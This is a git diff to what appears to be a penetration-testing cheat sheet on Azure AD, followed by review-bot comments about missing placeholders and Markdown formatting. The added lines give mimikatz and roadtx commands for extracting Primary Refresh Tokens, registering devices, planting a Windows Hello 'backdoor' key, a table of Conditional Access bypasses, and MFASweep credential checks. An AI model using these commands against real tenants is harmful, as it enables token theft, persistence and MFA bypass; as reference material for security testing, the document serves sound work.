diff --git a/assets/banner.png b/assets/banner.png index 1ab6ef26..f0f13b4a 100755 Binary files a/assets/banner.png and b/assets/banner.png differ diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index c322c3cd..59396a0a 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -95,6 +95,16 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9 ``` +### Extract PRT v1 + +```ps1 +mimikatz # sekurlsa::cloudap +mimikatz # sekurlsa::dpapi +mimikatz # dpapi::cloudapkd /keyvalue: /unprotect +roadtx browserprtauth --prt --prt-sessionkey --keep-open -url https://portal.azure.com +``` + + ### Extract PRT on Device with TPM * No method known to date. @@ -103,11 +113,17 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9 ### Generate a PRT by registering a device ```ps1 -roadtx interactiveauth -u user.lastname@domain.local -p password123 -r devicereg -roadtx device -n devicename -roadtx prt -u user.lastname@domain.local -p password123 –-key-pem devicename.key –-cert-pem devicename.pem -roadtx prtenrich –prt roadtx.prt -roadtx prt -u user.lastname@domain.local -p password123 –-key-pem devicename.key –-cert-pem devicename.pem -r 0.AVAApQL +# Get correct token audience +roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file + +# Registering device +roadtx device -a register -n + +# Request PRT +roadtx prt --refresh-token -c .pem -k .key + +# Use a PRT +roadtx browserprtauth --prt --prt-sessionkey --keep-open -url https://portal.azure.com ``` diff --git a/docs/cloud/azure/azure-devices-users-services.md b/docs/cloud/azure/azure-devices-users-services.md index 0949f172..cd8e733c 100644 --- a/docs/cloud/azure/azure-devices-users-services.md +++ b/docs/cloud/azure/azure-devices-users-services.md 
@@ -25,7 +25,24 @@ ### Join Devices +* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device) + + ### Register Devices +```ps1 +roadtx device -a register -n swkdeviceup +``` + + +### Windows Hello for Business + +```ps1 +roadtx.exe prtenrich --ngcmfa-drs-auth +roadtx.exe winhello -k swkdevicebackdoor.key +roadtx.exe prt -hk swkdevicebackdoor.key -u -c swkdeviceup.pem -k swkdeviceup.key +roadtx browserprtauth --prt --prt-sessionkey --keep-open -url https://portal.azure.com +``` + # Service Principals \ No newline at end of file diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index f2d8ac66..ebe57be8 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md 
@@ -22,17 +22,30 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table ``` -## Azure AD - Conditionnal Access Policy +## Azure AD - Conditional Access Policy -Enumerate Conditionnal Access Policies: `roadrecon plugin policies` +Conditional Access is used to restrict access to resources to compliant devices only. +* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database) +| CAP | Bypass | +|---------------------------|---------| +| Location / IP ranges | Corporate VPN, Guest Wifi | +| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) | +| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) | +| Azure AD Joined Device | Try to join a VM (Work Access)| +| Device requirement | / | +| MFA | / | +| Legacy Protocols | / | +| Compliant Device (Intune) | / | +| Domain Joined | / | ## Azure AD - MFA * [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services ```ps1 +Import-Module .\MFASweep.ps1 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS ``` diff --git a/docs/cloud/azure/azure-phishing.md b/docs/cloud/azure/azure-phishing.md index 98b35b06..243e2272 100644 --- a/docs/cloud/azure/azure-phishing.md +++ b/docs/cloud/azure/azure-phishing.md @@ -83,6 +83,11 @@ roadtx codeauth -c -r msgraph -t <0.A....> -ru 'https://
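Review bot: the argument values in the new `### Extract PRT v1` block (azure-access-and-token.md, hunk @@ -95) are missing, so none of the commands run as written: `dpapi::cloudapkd /keyvalue: /unprotect` has an empty `/keyvalue:`, and `roadtx browserprtauth --prt --prt-sessionkey --keep-open -url ...` has no value after either `--prt` or `--prt-sessionkey`. Angle-bracket placeholders were most likely swallowed by the Markdown renderer; escape them or use a visible token such as `<prt>` / `<sessionkey>` so the reader can tell which output of the preceding steps feeds each flag. The two blank lines before `### Extract PRT on Device with TPM` can also be collapsed to one, and a short sentence under the v1 heading explaining how it differs from the TPM case (where the next section says no method is known) would make the split between the two headings clear.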
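Review bot: the rewritten `### Generate a PRT by registering a device` block (azure-access-and-token.md, hunk @@ -103) removes the `roadtx interactiveauth ... -r devicereg` line that previously obtained the initial token, yet the first new command depends on `--refresh-token file`, so the prerequisite (a refresh token already saved to the roadtx auth file) is now implicit; add one line stating it. The placeholders are missing here too: `roadtx device -a register -n` has no device name, and `roadtx prt --refresh-token -c .pem -k .key` has lost the basenames, leaving `.pem` and `.key` as literal file names. `# Registering device` should read `# Register device` to match the imperative form of the other comments. On the plus side, this rewrite gets rid of the en dash in the old `–-key-pem` and `–prt` flags, which could never have worked when pasted.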
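Review bot: in the new `### Windows Hello for Business` block (azure-devices-users-services.md, hunk @@ -25), `roadtx.exe prt -hk swkdevicebackdoor.key -u -c swkdeviceup.pem -k swkdeviceup.key` has `-u` with no username, so the command fails at argument parsing; restore the placeholder. The block mixes `roadtx.exe` and `roadtx` for the same tool within four lines; pick one form. `swkdevicebackdoor.key` appears in both `winhello -k` and `prt -hk` and `swkdeviceup.pem`/`.key` match the `-n swkdeviceup` name in the `### Register Devices` block above, but nothing says which step creates which file; a one-line comment per command would fix that. The last line, `# Service Principals`, still has no newline at end of file, worth correcting while this file is being edited.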
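Review bot: the Conditional Access table (azure-enumeration.md, hunk @@ -22) sits directly under the `* Enumerate Conditional Access Policies` bullet with no blank line in between, which many Markdown renderers (Python-Markdown included) will not parse as a table; insert a blank line after the bullet. Typos inside the table: `acccess` should be `access`, `e.g for` should be `e.g. for`, and `Try to join a VM (Work Access)|` is missing the space before the closing `|` that every other cell has. The `/` used in the Bypass column is never defined; state explicitly whether it means "none known" or "not applicable", since the rows carrying it (MFA, Compliant Device, Domain Joined, ...) are exactly the controls a hardening reader will look for. The `Conditionnal` fix in the heading and prose and the added `Import-Module .\MFASweep.ps1` line in the MFASweep example are both good.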